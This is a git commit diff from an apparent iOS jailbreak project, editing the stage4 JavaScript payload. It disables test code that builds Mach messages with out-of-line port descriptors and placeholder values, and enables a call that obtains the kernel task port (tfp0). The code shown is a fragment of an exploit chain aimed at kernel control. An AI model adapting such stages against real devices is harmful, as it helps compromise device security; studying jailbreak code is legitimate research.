From 0df8ea8b4bb9d9ee9d45a56eb5df2c2c6a23127c Mon Sep 17 00:00:00 2001
From: spv420 <spv@spv.sh>
Date: Mon, 1 Aug 2022 01:10:25 -0400
Subject: native_ptr w00t

---
 src/stage4/main.js | 132 +++++++++++++++++++++++++++--------------------------
 1 file changed, 67 insertions(+), 65 deletions(-)

(limited to 'src/stage4/main.js')

diff --git a/src/stage4/main.js b/src/stage4/main.js
index 541dc44..6d14de1 100644
--- a/src/stage4/main.js
+++ b/src/stage4/main.js
@@ -55,74 +55,76 @@ function main() {
 	sym_cache["JSContextGetGlobalObject"] = JSContextGetGlobalObject + dyld_shc_slide;
 	prep_shit();
 
-	var init_port_set = new mach_msg_ool_ports_descriptor_t(4);
-	var addy = init_port_set.addy;
-	var init_port_set_obj = init_port_set.deref();
-	init_port_set_obj.address = 0x41414141;
-	init_port_set_obj.count = 0x42424242;
-	init_port_set_obj.disposition = 19;
-	init_port_set_obj.deallocate = false;
-	init_port_set_obj.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
-	init_port_set.write(init_port_set_obj, 0);
-	init_port_set.write(init_port_set_obj, 1);
-	init_port_set.write(init_port_set_obj, 2);
-	init_port_set.write(init_port_set_obj, 3);
-	p0laris_log("%s %s %s %s", JSON.stringify(init_port_set.deref(0)),
-							   JSON.stringify(init_port_set.deref(1)),
-							   JSON.stringify(init_port_set.deref(2)),
-							   JSON.stringify(init_port_set.deref(3)));
-	
-	var Head = new mach_msg_header_t();
-	var addy = Head.addy;
-	var Head_obj = Head.deref();
-	Head_obj.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
-	Head_obj.msgh_remote_port = 0x41424344;
-	Head_obj.msgh_local_port = 0x45464748;
-	Head_obj.msgh_id = 1337;
-	Head.write(Head_obj);
-	p0laris_log("%s", JSON.stringify(Head.deref()));
-
-	p0laris_log("here");
-
-	var req = new Request_sp(4);
-	p0laris_log("here");
-	var addy = req.addy;
-	p0laris_log("here");
-	var req_obj = req.deref();
-	p0laris_log("here");
-
-	req_obj.msgh_body.msgh_descriptor_count = 4;
-	p0laris_log("here");
-	for (var i = 0; i < 4; i++) {
-		req_obj.init_port_set[i].address = 0x1234;
-		req_obj.init_port_set[i].count = 0x1235;
-		req_obj.init_port_set[i].disposition = 19;
-		req_obj.init_port_set[i].deallocate = false;
-		req_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
-	}
-
-	p0laris_log("here");
-	req_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
-	p0laris_log("here");
-	req_obj.Head.msgh_remote_port = 0x41424344;
-	p0laris_log("here");
-	req_obj.Head.msgh_local_port = 0x45464748;
-	p0laris_log("here");
-	req_obj.Head.msgh_id = 1337;
-
-	p0laris_log("here");
-	req.write(req_obj);
-	p0laris_log("here");
-	p0laris_log("%s", JSON.stringify(req.deref(), function (key, value) {
-		if (typeof value === 'number') {
-			return "0x" + value.toString(16);
+	if (0) {
+		var init_port_set = new mach_msg_ool_ports_descriptor_t(4);
+		var addy = init_port_set.addy;
+		var init_port_set_obj = init_port_set.deref();
+		init_port_set_obj.address = 0x41414141;
+		init_port_set_obj.count = 0x42424242;
+		init_port_set_obj.disposition = 19;
+		init_port_set_obj.deallocate = false;
+		init_port_set_obj.type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
+		init_port_set.write(init_port_set_obj, 0);
+		init_port_set.write(init_port_set_obj, 1);
+		init_port_set.write(init_port_set_obj, 2);
+		init_port_set.write(init_port_set_obj, 3);
+		p0laris_log("%s %s %s %s", JSON.stringify(init_port_set.deref(0)),
+								   JSON.stringify(init_port_set.deref(1)),
+								   JSON.stringify(init_port_set.deref(2)),
+								   JSON.stringify(init_port_set.deref(3)));
+		
+		var Head = new mach_msg_header_t();
+		var addy = Head.addy;
+		var Head_obj = Head.deref();
+		Head_obj.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+		Head_obj.msgh_remote_port = 0x41424344;
+		Head_obj.msgh_local_port = 0x45464748;
+		Head_obj.msgh_id = 1337;
+		Head.write(Head_obj);
+		p0laris_log("%s", JSON.stringify(Head.deref()));
+
+		p0laris_log("here");
+
+		var req = new Request_sp(4);
+		p0laris_log("here");
+		var addy = req.addy;
+		p0laris_log("here");
+		var req_obj = req.deref();
+		p0laris_log("here");
+
+		req_obj.msgh_body.msgh_descriptor_count = 4;
+		p0laris_log("here");
+		for (var i = 0; i < 4; i++) {
+			req_obj.init_port_set[i].address = 0x1234;
+			req_obj.init_port_set[i].count = 0x1235;
+			req_obj.init_port_set[i].disposition = 19;
+			req_obj.init_port_set[i].deallocate = false;
+			req_obj.init_port_set[i].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
 		}
 
-		return value;
-	}, "\t"));
-	p0laris_log("here");
+		p0laris_log("here");
+		req_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE);
+		p0laris_log("here");
+		req_obj.Head.msgh_remote_port = 0x41424344;
+		p0laris_log("here");
+		req_obj.Head.msgh_local_port = 0x45464748;
+		p0laris_log("here");
+		req_obj.Head.msgh_id = 1337;
+
+		p0laris_log("here");
+		req.write(req_obj);
+		p0laris_log("here");
+		p0laris_log("%s", JSON.stringify(req.deref(), function (key, value) {
+			if (typeof value === 'number') {
+				return "0x" + value.toString(16);
+			}
+
+			return value;
+		}, "\t"));
+		p0laris_log("here");
+	}
 
-//	var tfp0 = get_kernel_task();
+	var tfp0 = get_kernel_task();
 
 	syslog(LOG_SYSLOG, "__p0laris_LOG_END__");
 	return 0;
-- 
cgit v1.2.3